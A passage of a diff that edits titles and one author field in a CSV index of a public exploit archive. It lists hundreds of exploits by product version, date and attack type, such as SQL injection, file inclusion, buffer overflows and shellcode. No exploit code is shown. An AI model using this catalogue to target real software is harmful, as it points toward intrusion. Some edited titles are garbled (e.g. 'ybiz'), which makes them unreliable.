9988,platforms/windows/local/9988.txt,"Adobe Photoshop Elements - Active File Monitor Service Local Privilege Escalation",2009-10-29,"bellick ",windows,local,0 @@ -9367,7 +9367,7 @@ id,file,description,date,author,platform,type,port 9993,platforms/multiple/remote/9993.txt,"Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross-Site Scripting Vulnerability",2009-11-09,"Richard H. Brain",multiple,remote,0 9994,platforms/multiple/remote/9994.txt,"Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability",2009-11-09,"John Kew",multiple,remote,0 9995,platforms/multiple/remote/9995.txt,"Apache Tomcat Form Authentication Username Enumeration Weakness",2009-11-09,"D. Matscheko",multiple,remote,0 -9996,platforms/php/webapps/9996.txt,"Article Directory Index.PHP Remote File Include Vulnerability",2009-11-12,mozi,php,webapps,0 +9996,platforms/php/webapps/9996.txt,"Article Directory Index.php Remote File Include Vulnerability",2009-11-12,mozi,php,webapps,0 9997,platforms/multiple/remote/9997.txt,"Blender 2.49b - (.blend) Remote Command Execution Vulnerability",2009-11-09,"Fernando Russ",multiple,remote,0 9998,platforms/windows/remote/9998.c,"BulletProof FTP 2.63 b56 Client Malformed '.bps' File Stack Buffer Overflow",2009-10-07,"Rafa De Sousa",windows,remote,21 9999,platforms/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 Pre-Auth DoS",2009-09-30,"Francis Provencher",windows,dos,21 @@ -9470,7 +9470,7 @@ id,file,description,date,author,platform,type,port 10101,platforms/php/webapps/10101.txt,"telepark wiki 2.4.23 - Multiple Vulnerabilities",2009-11-16,Abysssec,php,webapps,0 10102,platforms/windows/dos/10102.pl,"Safari 4.0.3 (Win32) CSS Remote Denial of Service Exploit",2009-11-16,"Jeremy Brown",windows,dos,80 10103,platforms/windows/dos/10103.txt,"Mozilla Thunderbird 2.0.0.23 Mozilla Seamonkey 2.0 (jar50.dll) Null Pointer Derefernce",2009-11-16,"Marcin Ressel",windows,dos,0 -10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server 'APPE' and 'DELE' Command DoS",2009-11-13,zhangmc,windows,dos,21 +10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' and 'DELE' Command DoS",2009-11-13,zhangmc,windows,dos,21 10105,platforms/php/webapps/10105.txt,"Cifshanghai (chanpin_info.php) CMS SQL Injection",2009-11-16,ProF.Code,php,webapps,0 10106,platforms/windows/dos/10106.c,"Avast 4.8.1351.0 Antivirus - aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0 10107,platforms/windows/local/10107.pl,"Icarus 2.0 - (.pgn) Universal Local Buffer Overflow Exploit (SEH)",2009-11-17,"D3V!L FUCK3R",windows,local,0 @@ -9545,7 +9545,7 @@ id,file,description,date,author,platform,type,port 10245,platforms/php/webapps/10245.txt,"phpBazar <= 2.1.1fix (cid) SQL Injection",2009-11-28,MizoZ,php,webapps,0 10246,platforms/php/webapps/10246.txt,"SweetRice <= 0.5.3 - Remote File Include Vulnerability",2009-11-29,"cr4wl3r ",php,webapps,0 10247,platforms/hardware/webapps/10247.txt,"Micronet SP1910 Data Access Controller UI XSS & HTML Code Injection",2009-11-27,K053,hardware,webapps,0 -10248,platforms/php/webapps/10248.txt,"sugar crm 5.5.0.rc2 and 5.2.0j - Multiple Vulnerabilities",2009-11-29,waraxe,php,webapps,0 +10248,platforms/php/webapps/10248.txt,"sugar crm 5.5.0.rc2 / 5.2.0j - Multiple Vulnerabilities",2009-11-29,waraxe,php,webapps,0 10249,platforms/php/webapps/10249.txt,"adaptcms lite 1.5 - Remote File Inclusion Vulnerability",2009-11-29,v3n0m,php,webapps,0 10250,platforms/php/webapps/10250.txt,"Joomla Component MusicGallery SQL Injection Vulnerability",2009-11-30,"Don Tukulesto",php,webapps,0 10252,platforms/php/webapps/10252.txt,"Joomla Component Quick News SQL Injection Vulnerability",2009-11-30,"Don Tukulesto",php,webapps,0 @@ -9794,7 +9794,7 @@ id,file,description,date,author,platform,type,port 10549,platforms/php/webapps/10549.txt,"Joomla Component Event Manager Blind SQL Injection Vulnerability",2009-12-18,FL0RiX,php,webapps,0 10550,platforms/php/webapps/10550.txt,"Joomla Component City Portal Blind SQL Injection Vulnerability",2009-12-18,FL0RiX,php,webapps,0 10552,platforms/php/webapps/10552.txt,"FestOs <= 2.2.1 - Multiple RFI Exploit",2009-12-19,"cr4wl3r ",php,webapps,0 -10553,platforms/hardware/dos/10553.rb,"3Com OfficeConnect Routers Remote DoS Exploit",2009-12-19,"Alberto Ortega Llamas",hardware,dos,0 +10553,platforms/hardware/dos/10553.rb,"3Com OfficeConnect Routers - Remote DoS Exploit",2009-12-19,"Alberto Ortega Llamas",hardware,dos,0 10555,platforms/php/webapps/10555.txt,"Barracuda Web Firewall 660 Firmware 7.3.1.007 - Vulnerability",2009-12-19,Global-Evolution,php,webapps,0 10556,platforms/windows/local/10556.c,"PlayMeNow 7.3 / 7.4 - Malformed M3U Playlist File Buffer",2009-12-19,Gr33nG0bL1n,windows,local,0 10557,platforms/php/local/10557.php,"PHP 5.2.12/5.3.1 - symlink() open_basedir Bypass",2009-12-19,"Maksymilian Arciemowicz",php,local,0 @@ -9810,7 +9810,7 @@ id,file,description,date,author,platform,type,port 10569,platforms/php/webapps/10569.txt,"Ignition 1.2 - Multiple Local File Inclusion Vulnerabilities",2009-12-20,cOndemned,php,webapps,0 10570,platforms/php/webapps/10570.txt,"Pandora Fms Monitoring Z0D Vulnerability",2009-12-20,Global-Evolution,php,webapps,0 10571,platforms/php/webapps/10571.txt,"PacketFence Network Access Controller XSS Vulnerability",2009-12-20,K053,php,webapps,0 -10572,platforms/php/webapps/10572.txt,"4images 1.7.1 - Remote SQL Injection Vulnerability",2009-12-20,"Master Mind",php,webapps,0 +10572,platforms/php/webapps/10572.txt,"4Images 1.7.1 - Remote SQL Injection Vulnerability",2009-12-20,"Master Mind",php,webapps,0 10573,platforms/asp/webapps/10573.txt,"8pixel.net 2009. Database Disclosure Vulnerability",2009-12-20,LionTurk,asp,webapps,0 10574,platforms/php/webapps/10574.txt,"phUploader 2 - Remote File Upload Vulnerability",2009-12-20,wlhaan-hacker,php,webapps,0 10575,platforms/php/webapps/10575.txt,"Drumbeat CMS 1.0 - SQL Injection Exploit",2009-12-21,Sora,php,webapps,0 @@ -9818,7 +9818,7 @@ id,file,description,date,author,platform,type,port 10577,platforms/windows/local/10577.pl,"PlayMeNow - Malformed M3U Playlist Buffer Overflow (SEH)",2009-12-21,"ThE g0bL!N",windows,local,0 10578,platforms/php/webapps/10578.txt,"Ultimate Uploader 1.3 - Remote File Upload Vulnerability",2009-12-21,"Master Mind",php,webapps,0 10579,platforms/multiple/remote/10579.py,"TLS Renegotiation Vulnerability PoC",2009-12-21,"RedTeam Pentesting",multiple,remote,0 -10580,platforms/hardware/dos/10580.rb,"3Com OfficeConnect Routers DoS (Content-Type)",2009-12-21,"Alberto Ortega",hardware,dos,0 +10580,platforms/hardware/dos/10580.rb,"3Com OfficeConnect Routers - DoS (Content-Type)",2009-12-21,"Alberto Ortega",hardware,dos,0 10582,platforms/asp/webapps/10582.txt,"Absolute Shopping Cart SQL Injection Vulnerability",2009-12-21,Gamoscu,asp,webapps,0 10583,platforms/php/webapps/10583.txt,"social Web CMS <= beta 2 - Multiple Vulnerabilities",2009-12-21,"cp77fk4r ",php,webapps,0 10584,platforms/php/webapps/10584.txt,"PHPhotoalbum Remote File Upload Vulnerability",2009-12-21,"wlhaan hacker",php,webapps,0 @@ -10025,7 +10025,7 @@ id,file,description,date,author,platform,type,port 10823,platforms/asp/webapps/10823.txt,"UranyumSoft Ýlan Servisi - Database Disclosure Vulnerability",2009-12-30,LionTurk,asp,webapps,0 10824,platforms/php/webapps/10824.txt,"K-Rate SQL Injection Vulnerability",2009-12-30,e.wiZz,php,webapps,0 10825,platforms/php/dos/10825.sh,"WordPress <= 2.9 - DoS (0day)",2009-12-31,emgent,php,dos,80 -10826,platforms/php/dos/10826.sh,"Drupal <= 6.16 and 5.21 - DoS (0day)",2009-12-31,emgent,php,dos,80 +10826,platforms/php/dos/10826.sh,"Drupal <= 6.16 / 5.21 - DoS (0day)",2009-12-31,emgent,php,dos,80 10827,platforms/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 SEH Exploit",2009-12-30,"Sébastien Duquette",windows,local,0 10828,platforms/php/webapps/10828.txt,"vBulletin ads_saed 1.5 (bnnr.php) SQL Injection Vulnerability",2009-12-30,"Hussin X",php,webapps,0 10829,platforms/php/dos/10829.pl,"vBulletin Denial of Service Vulnerability",2009-12-30,R3d-D3V!L,php,dos,0 @@ -11072,7 +11072,7 @@ id,file,description,date,author,platform,type,port 12123,platforms/php/webapps/12123.txt,"joomla Component com_pcchess Local File Inclusion",2010-04-09,team_elite,php,webapps,0 12124,platforms/php/webapps/12124.txt,"joomla component huruhelpdesk SQL Injection Vulnerability",2010-04-09,bumble_be,php,webapps,0 12128,platforms/php/webapps/12128.txt,"GarageSales Remote Upload Vulnerability",2010-04-09,saidinh0,php,webapps,0 -12130,platforms/linux/local/12130.py,"Linux Kernel <= 2.6.34-rc3 ReiserFS xattr (Redhat/Ubuntu 9.10) - Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0 +12130,platforms/linux/local/12130.py,"(Linux Kernel <= 2.6.34-rc3) ReiserFS xattr (Redhat/Ubuntu 9.10) - Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0 12131,platforms/windows/dos/12131.py,"Tembria Server Monitor 5.6.0 - Denial of Service",2010-04-09,Lincoln,windows,dos,0 12132,platforms/php/webapps/12132.pl,"joomla component com_agenda 1.0.1 - (id) SQL Injection Vulnerability",2010-04-09,v3n0m,php,webapps,0 12133,platforms/multiple/webapps/12133.txt,"Asset Manager 1.0 Shell Upload Vulnerability",2010-04-09,"Shichemt Alen and NeT_Own3r",multiple,webapps,0 @@ -11305,9 +11305,9 @@ id,file,description,date,author,platform,type,port 12384,platforms/php/webapps/12384.txt,"Powered by iNetScripts: Shell Upload Vulnerability",2010-04-25,Sec-q8,php,webapps,0 12385,platforms/php/webapps/12385.html,"TR Forum 1.5 - Insert Admin CSRF Vulnerability",2010-04-25,EL-KAHINA,php,webapps,0 12386,platforms/php/webapps/12386.txt,"PHP Classifieds 6.09 - E-mail Dump Vulnerability",2010-04-25,indoushka,php,webapps,0 -12387,platforms/php/webapps/12387.sh,"webessence 1.0.2 - Multiple Vulnerabilities",2010-04-25,"white_sheep, R00T_ATI and epicfail",php,webapps,0 +12387,platforms/php/webapps/12387.sh,"webessence 1.0.2 - Multiple Vulnerabilities",2010-04-25,r00t,php,webapps,0 12388,platforms/windows/local/12388.rb,"WM Downloader 3.0.0.9 - Buffer Overflow (Metasploit)",2010-04-25,blake,windows,local,0 -12395,platforms/php/webapps/12395.txt,"2daybiz Advanced Poll Script XSS and Authentication Bypass",2010-04-26,Sid3^effects,php,webapps,0 +12395,platforms/php/webapps/12395.txt,"2DayBiz Advanced Poll Script - XSS and Authentication Bypass",2010-04-26,Sid3^effects,php,webapps,0 12396,platforms/php/webapps/12396.txt,"OpenCominterne 1.01 - Local File Include Vulnerability",2010-04-26,"cr4wl3r ",php,webapps,0 12398,platforms/php/webapps/12398.txt,"Opencourrier 2.03beta - (RFI/LFI) Multiple File Include Vulnerability",2010-04-26,"cr4wl3r ",php,webapps,0 12399,platforms/php/webapps/12399.txt,"Uiga Personal Portal index.php (view) SQL Injection",2010-04-26,41.w4r10r,php,webapps,0 @@ -11323,7 +11323,7 @@ id,file,description,date,author,platform,type,port 12411,platforms/php/webapps/12411.txt,"FreeRealty(Free Real Estate Listing Software) - Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 12412,platforms/php/webapps/12412.txt,"Ramaas Software CMS SQL Injection Vulnerability",2010-04-27,41.w4r10r,php,webapps,0 12413,platforms/php/webapps/12413.txt,"i-Net Online Community XSS and Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 -12414,platforms/php/webapps/12414.txt,"2daybiz Auction Script Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 +12414,platforms/php/webapps/12414.txt,"2DayBiz Auction Script - Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 12415,platforms/php/webapps/12415.txt,"Infocus Real Estate Enterprise Edition Script Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 12416,platforms/php/webapps/12416.txt,"PHP Quick Arcade 3.0.21 - Multiple Vulnerabilites",2010-04-27,ITSecTeam,php,webapps,0 12417,platforms/windows/remote/12417.py,"Bigant Messenger <= 2.52 - (AntCore.dll) RegisterCom() Remote Heap Overflow (0day)",2010-04-27,mr_me,windows,remote,0 @@ -11397,7 +11397,7 @@ id,file,description,date,author,platform,type,port 12488,platforms/php/webapps/12488.txt,"Gallo 0.1.0 - Remote File Include Vulnerability",2010-05-03,"cr4wl3r ",php,webapps,0 12489,platforms/php/webapps/12489.txt,"Joomla_1.6.0-Alpha2 - XSS Vulnerabilities",2010-05-03,mega-itec.com,php,webapps,0 12491,platforms/multiple/dos/12491.html,"All browsers - Crash Exploit (0day)",2010-05-03,"Inj3ct0r Team",multiple,dos,0 -14025,platforms/php/webapps/14025.txt,"2daybiz Job site Script SQL injection",2010-06-24,Sangteamtham,php,webapps,0 +14025,platforms/php/webapps/14025.txt,"2DayBiz Job Site Script - SQL injection",2010-06-24,Sangteamtham,php,webapps,0 12492,platforms/windows/dos/12492.html,"Firefox 3.6.3 Fork Bomb DoS",2010-05-03,Dr_IDE,windows,dos,0 12493,platforms/multiple/dos/12493.html,"All Browsers - Long Unicode DoS PoC",2010-05-03,Dr_IDE,multiple,dos,0 12494,platforms/windows/dos/12494.pl,"Winamp 5.572 - Local Crash PoC (0day)",2010-05-03,R3d-D3V!L,windows,dos,0 @@ -11481,7 +11481,7 @@ id,file,description,date,author,platform,type,port 12582,platforms/windows/remote/12582.txt,"Zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0 12583,platforms/php/webapps/12583.txt,"e-webtech (fixed_page.asp) SQL Injection Vulnerability",2010-05-12,FL0RiX,php,webapps,0 12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 - (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0 -12585,platforms/php/webapps/12585.txt,"4images <= 1.7.7 (image_utils.php) Remote Command Execution Vulnerability",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0 +12585,platforms/php/webapps/12585.txt,"4Images <= 1.7.7 - (image_utils.php) Remote Command Execution Vulnerability",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0 12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection Exploit",2010-05-13,Cryptovirus,php,webapps,0 12587,platforms/linux/remote/12587.c,"WFTPD Server 3.30 - (0day) Multiple Vulnerabilities",2010-05-13,"fl0 fl0w",linux,remote,21 12588,platforms/linux/dos/12588.txt,"Samba - Multiple DoS Vulnerabilities",2010-05-13,"laurent gaffie",linux,dos,0 @@ -11566,7 +11566,7 @@ id,file,description,date,author,platform,type,port 12677,platforms/windows/local/12677.html,"Rumba FTP Client FTPSFtp.dll 4.2.0.0 - OpenSession() Buffer Overflow",2010-05-21,sinn3r,windows,local,0 28046,platforms/php/webapps/28046.txt,"dotWidget for articles 2.0 admin/editconfig.php Multiple Parameter Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 28047,platforms/php/webapps/28047.txt,"CMS Faethon 1.3.2 - Multiple Remote File Include Vulnerabilities",2006-06-17,"M.Hasran Addahroni",php,webapps,0 -28048,platforms/php/webapps/28048.txt,"RahnemaCo Page.PHP PageID Remote File Include Vulnerability",2006-06-17,CrAzY.CrAcKeR,php,webapps,0 +28048,platforms/php/webapps/28048.txt,"RahnemaCo Page.php PageID Remote File Include Vulnerability",2006-06-17,CrAzY.CrAcKeR,php,webapps,0 28049,platforms/windows/dos/28049.html,"GreenBrowser 6.4.0515 - Heap Overflow Vulnerability",2013-09-03,Asesino04,windows,dos,0 28050,platforms/windows/dos/28050.txt,"Oracle Java lookUpByteBI - Heap Buffer Overflow",2013-09-03,GuHe,windows,dos,0 28051,platforms/windows/dos/28051.py,"PotPlayer 1.5.39036 - (.wav) Crash PoC",2013-09-03,ariarat,windows,dos,0 @@ -11733,7 +11733,7 @@ id,file,description,date,author,platform,type,port 13257,platforms/bsdi_x86/shellcode/13257.txt,"bsdi/x86 - execve /bin/sh (45 bytes)",2004-09-26,duke,bsdi_x86,shellcode,0 13258,platforms/bsdi_x86/shellcode/13258.txt,"bsdi/x86 - execve /bin/sh (46 bytes)",2004-09-26,vade79,bsdi_x86,shellcode,0 30245,platforms/ios/webapps/30245.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities",2013-12-12,Vulnerability-Lab,ios,webapps,0 -30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 Links.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0 +30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 Links.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0 13260,platforms/bsdi_x86/shellcode/13260.c,"bsdi/x86 - execve /bin/sh toupper evasion (97 bytes)",2004-09-26,N/A,bsdi_x86,shellcode,0 13261,platforms/freebsd_x86/shellcode/13261.txt,"FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging",2009-04-13,c0d3_z3r0,freebsd_x86,shellcode,0 13262,platforms/freebsd_x86/shellcode/13262.txt,"freebsd/x86 - setreuid_ execve(pfctl -d) (56 bytes)",2008-09-12,suN8Hclf,freebsd_x86,shellcode,0 @@ -12091,7 +12091,7 @@ id,file,description,date,author,platform,type,port 13731,platforms/linux/shellcode/13731.c,"x86 linux hard / unclean reboot (29 bytes)",2010-06-03,gunslinger_,linux,shellcode,0 13732,platforms/linux/shellcode/13732.c,"x86 linux hard / unclean reboot (33 bytes)",2010-06-03,gunslinger_,linux,shellcode,0 13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall command - 39 bytes",2010-06-03,"Jonathan Salwan",solaris,shellcode,0 -13735,platforms/osx/remote/13735.py,"OS X EvoCam Web Server Buffer Overflow Exploit 3.6.6 and 3.6.7",2010-06-05,d1dn0t,osx,remote,8080 +13735,platforms/osx/remote/13735.py,"OS X EvoCam Web Server 3.6.6 / 3.6.7 - Buffer Overflow Exploit",2010-06-05,d1dn0t,osx,remote,8080 13736,platforms/php/webapps/13736.txt,"DDLCMS 2.1 - (skin) Remote File Inclusion Vulnerability",2010-06-06,eidelweiss,php,webapps,0 13737,platforms/php/webapps/13737.txt,"Joomla Component com_djartgallery - Multiple Vulnerabilities",2010-06-06,d0lc3,php,webapps,0 13738,platforms/php/webapps/13738.txt,"PHP Director 0.2 - SQL Injection",2010-06-06,Mr.Rat,php,webapps,0 @@ -12195,7 +12195,7 @@ id,file,description,date,author,platform,type,port 13842,platforms/asp/webapps/13842.txt,"VU Web Visitor Analyst Authentication Bypass",2010-06-12,"L0rd CrusAd3r",asp,webapps,0 13843,platforms/asp/webapps/13843.txt,"BrightSuite Groupware SQL Injection Vulnerability",2010-06-12,"L0rd CrusAd3r",asp,webapps,0 13844,platforms/php/webapps/13844.pl,"Collabtive 0.6.3 - Multiple Vulnerabilities",2010-06-12,DNX,php,webapps,0 -13845,platforms/php/webapps/13845.txt,"Yamamah (news) SQL Injection and Source Code Disclosure Vulnerability",2010-06-12,anT!-Tr0J4n,php,webapps,0 +13845,platforms/php/webapps/13845.txt,"Yamamah (news) - SQL Injection / Source Code Disclosure Vulnerability",2010-06-12,anT!-Tr0J4n,php,webapps,0 13846,platforms/asp/webapps/13846.txt,"BDSMIS TraX with Payroll SQL Injection Vulnerability",2010-06-12,"L0rd CrusAd3r",asp,webapps,0 13847,platforms/php/webapps/13847.txt,"phpplanner XSS / SQL Vulnerability",2010-06-12,anT!-Tr0J4n,php,webapps,0 13848,platforms/php/webapps/13848.txt,"Infront SQL Injection Vulnerability",2010-06-12,TheMaStEr,php,webapps,0 @@ -12236,7 +12236,7 @@ id,file,description,date,author,platform,type,port 13891,platforms/asp/webapps/13891.html,"AspTR EXtended CSRF Bug",2010-06-16,FreWaL,asp,webapps,0 13892,platforms/php/webapps/13892.txt,"PHPAuctionSystem Upload Vulnerability",2010-06-16,Sid3^effects,php,webapps,0 13893,platforms/php/webapps/13893.txt,"Nakid CMS 0.5.2 - (fckeditor) Remote Arbitrary File Upload Exploit",2010-06-16,eidelweiss,php,webapps,0 -13894,platforms/php/webapps/13894.txt,"2daybiz online classified system SQLi AND XSS Vulnerability",2010-06-16,Sid3^effects,php,webapps,0 +13894,platforms/php/webapps/13894.txt,"2DayBiz Online Classified System - SQLi / XSS Vulnerabilities",2010-06-16,Sid3^effects,php,webapps,0 13895,platforms/windows/local/13895.py,"Rosoft Audio Converter 4.4.4 - Buffer Overflow",2010-06-16,blake,windows,local,0 13897,platforms/php/webapps/13897.txt,"Real Estate SQL Injection Vulnerability",2010-06-16,"L0rd CrusAd3r",php,webapps,0 13898,platforms/php/webapps/13898.pl,"DMSEasy 0.9.7 - (fckeditor) Arbitrary File Upload",2010-06-17,sh00t0ut,php,webapps,0 @@ -12335,24 +12335,24 @@ id,file,description,date,author,platform,type,port 14002,platforms/freebsd/local/14002.c,"FreeBSD Kernel - nfs_mount() Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,local,0 14003,platforms/freebsd/dos/14003.c,"FreeBSD Kernel - mountnfs() Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,dos,0 14004,platforms/multiple/webapps/14004.txt,"InterScan Web Security 5.0 - Arbitrary File Upload & Local Privilege Escalation",2010-06-23,"Ivan Huertas",multiple,webapps,0 -14005,platforms/php/webapps/14005.txt,"2daybiz MLM Script SQL Injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 +14005,platforms/php/webapps/14005.txt,"2DayBiz MLM Script - SQL Injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 14007,platforms/php/webapps/14007.txt,"Custom Business Card script SQL Injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 -14008,platforms/php/webapps/14008.txt,"2daybiz matrimonial script SQL Injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 -14009,platforms/php/webapps/14009.txt,"2daybiz Freelance script SQL Injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 +14008,platforms/php/webapps/14008.txt,"2DayBiz matrimonial Script - SQL Injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 +14009,platforms/php/webapps/14009.txt,"2DayBiz Freelance Script - SQL Injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 14010,platforms/novell/dos/14010.txt,"Novell iManager - Multiple Vulnerabilities",2010-06-24,"Core Security Technologies",novell,dos,48080 14011,platforms/php/webapps/14011.txt,"OpenEMR Electronic Medical Record Software 3.2 - Multiple Vulnerabilities",2010-06-24,"David Shaw",php,webapps,0 14012,platforms/multiple/dos/14012.txt,"Weborf HTTP Server Denial of Service Vulnerability",2010-06-24,Crash,multiple,dos,80 14013,platforms/windows/remote/14013.txt,"UFO: Alien Invasion 2.2.1 - Remote Arbitrary Code Execution Vulnerability",2010-06-24,"Jason Geffner",windows,remote,0 14014,platforms/win32/shellcode/14014.pl,"ShellCode WinXP SP3 SPA URLDownloadToFileA + CreateProcessA + ExitProcess",2010-06-24,d0lc3,win32,shellcode,0 -14015,platforms/php/webapps/14015.txt,"2DayBiz photo sharing script SQL Injection Vulnerability",2010-06-24,JaMbA,php,webapps,0 +14015,platforms/php/webapps/14015.txt,"2DayBiz photo sharing Script - SQL Injection Vulnerability",2010-06-24,JaMbA,php,webapps,0 14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta (init.php) Remote File Inclusion Vulnerability",2010-06-24,v3n0m,php,webapps,0 14017,platforms/php/webapps/14017.txt,"Joomla Component com_realtyna - LFI Vulnerability",2010-06-24,MISTERFRIBO,php,webapps,0 -14018,platforms/php/webapps/14018.txt,"2DayBiz Video Community portal - 'user-profile.php' SQL Injection Vulnerability",2010-06-24,Sangteamtham,php,webapps,0 +14018,platforms/php/webapps/14018.txt,"2DayBiz Video Community Portal - 'user-profile.php' SQL Injection Vulnerability",2010-06-24,Sangteamtham,php,webapps,0 14019,platforms/php/webapps/14019.txt,"2DayBiz Real Estate Portal - 'viewpropertydetails.php' SQL injection",2010-06-24,Sangteamtham,php,webapps,0 -14020,platforms/php/webapps/14020.txt,"2DayBiz - The Web Template Software SQL Injection and XSS Vulnerability",2010-06-24,Sangteamtham,php,webapps,0 +14020,platforms/php/webapps/14020.txt,"2DayBiz The Web Template Software - SQL Injection / XSS Vulnerabilities",2010-06-24,Sangteamtham,php,webapps,0 14026,platforms/php/webapps/14026.txt,"AbleDating script SQL Injection Vulnerability",2010-06-24,JaMbA,php,webapps,0 14027,platforms/php/webapps/14027.txt,"ActiveCollab 2.3.0 - Local File Inclusion / Directory Traversal",2010-06-24,"Jose Carlos de Arriba",php,webapps,0 -14028,platforms/php/webapps/14028.txt,"2daybiz B2B Portal Script SQL Injection Vulnerability",2010-06-24,JaMbA,php,webapps,0 +14028,platforms/php/webapps/14028.txt,"2DayBiz B2B Portal Script - SQL Injection Vulnerability",2010-06-24,JaMbA,php,webapps,0 14029,platforms/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client 2.2.1 - 'Request' Insecure Encoding Algorithm",2010-06-24,sinn3r,windows,local,0 14030,platforms/asp/webapps/14030.pl,"phportal_1.2 (gunaysoft.php) Remote File Include Vulnerability",2010-06-24,Ma3sTr0-Dz,asp,webapps,0 14032,platforms/windows/dos/14032.pl,"Winstats (.fma) Local Buffer Overflow PoC",2010-06-24,Madjix,windows,dos,0 @@ -12363,8 +12363,8 @@ id,file,description,date,author,platform,type,port 14044,platforms/windows/local/14044.pl,"WM Downloader 2.9.2 - Stack Buffer Overflow",2010-06-25,Madjix,windows,local,0 14116,platforms/linux/shellcode/14116.txt,"Linux/ARM - setuid(0) & kill(-1_ SIGKILL) (28 bytes)",2010-06-29,"Jonathan Salwan",linux,shellcode,0 14046,platforms/windows/local/14046.py,"FieldNotes 32 5.0 - Buffer Overflow (SEH)",2010-06-25,TecR0c,windows,local,0 -14047,platforms/php/webapps/14047.txt,"2DayBiz Matrimonial Script SQL Injection and Cross-Site Scripting",2010-06-25,Sangteamtham,php,webapps,0 -14048,platforms/php/webapps/14048.txt,"2DayBiz Multiple SQL Injections",2010-06-25,Sangteamtham,php,webapps,0 +14047,platforms/php/webapps/14047.txt,"2DayBiz Matrimonial Script - SQL Injection / Cross-Site Scripting",2010-06-25,Sangteamtham,php,webapps,0 +14048,platforms/php/webapps/14048.txt,"2DayBiz - Multiple SQL Injections",2010-06-25,Sangteamtham,php,webapps,0 14049,platforms/php/webapps/14049.html,"Allomani Songs & Clips Script 2.7.0 - [CSRF] Add Admin Account",2010-06-25,G0D-F4Th3rG0D-F4Th3r,php,webapps,0 14050,platforms/php/webapps/14050.txt,"ARSC Really Simple Chat 3.3 - Remote File Inclusion & XSS Vulnerability",2010-06-25,"Zer0 Thunder",php,webapps,0 14051,platforms/php/webapps/14051.txt,"2daybiz B2B Portal Script (selling_buy_leads1.php) SQL Injection Vulnerability",2010-06-25,r45c4l,php,webapps,0 @@ -12384,13 +12384,13 @@ id,file,description,date,author,platform,type,port 14063,platforms/php/webapps/14063.txt,"Joomla JE Job Component com_jejob - LFI Vulnerability",2010-06-26,Sid3^effects,php,webapps,0 14064,platforms/php/webapps/14064.txt,"Joomla Component JE Section Finder LFI Vulnerability",2010-06-26,Sid3^effects,php,webapps,0 14068,platforms/windows/local/14068.py,"Winamp 5.572 - Local BoF Exploit (Windows 7 ASLR and DEP Bypass)",2010-06-26,Node,windows,local,0 -14073,platforms/php/webapps/14073.txt,"2daybiz Matrimonial Script smartresult.php SQL Injection Vulnerability",2010-06-27,"Easy Laster",php,webapps,0 +14073,platforms/php/webapps/14073.txt,"2DayBiz Matrimonial Script - smartresult.php SQL Injection Vulnerability",2010-06-27,"Easy Laster",php,webapps,0 14070,platforms/php/webapps/14070.txt,"Speedy 1.0 - Remote Shell Upload Vulnerability",2010-06-26,"ViRuS Qalaa",php,webapps,0 14071,platforms/windows/dos/14071.pl,"FoxPlayer 2 - (.m3u) Local BoF PoC",2010-06-26,Madjix,windows,dos,0 14072,platforms/windows/dos/14072.c,"UltraISO 9.3.6.2750 - (.mds) (.mdf) Buffer Overflow PoC",2010-06-27,"fl0 fl0w",windows,dos,0 -14074,platforms/php/webapps/14074.rb,"2daybiz Polls Script SQL Injection Vulnerability Exploit",2010-06-27,"Easy Laster",php,webapps,0 -14075,platforms/php/webapps/14075.rb,"2daybiz Freelance Script SQL Injection Vulnerability Exploit",2010-06-27,"Easy Laster",php,webapps,0 -14076,platforms/php/webapps/14076.rb,"2daybiz Photo Sharing Script SQL Injection Vulnerability",2010-06-27,"Easy Laster",php,webapps,0 +14074,platforms/php/webapps/14074.rb,"2DayBiz ybiz Polls Script - SQL Injection Vulnerability Exploit",2010-06-27,"Easy Laster",php,webapps,0 +14075,platforms/php/webapps/14075.rb,"2DayBiz ybiz Freelance Script - SQL Injection Vulnerability Exploit",2010-06-27,"Easy Laster",php,webapps,0 +14076,platforms/php/webapps/14076.rb,"2DayBiz Photo Sharing Script - SQL Injection Vulnerability",2010-06-27,"Easy Laster",php,webapps,0 14077,platforms/windows/local/14077.rb,"BlazeDVD 6.0 - Buffer Overflow Exploit (Metasploit)",2010-06-27,blake,windows,local,0 14078,platforms/php/webapps/14078.txt,"Bilder Upload Script - Datei Upload 1.09 - Remote Shell 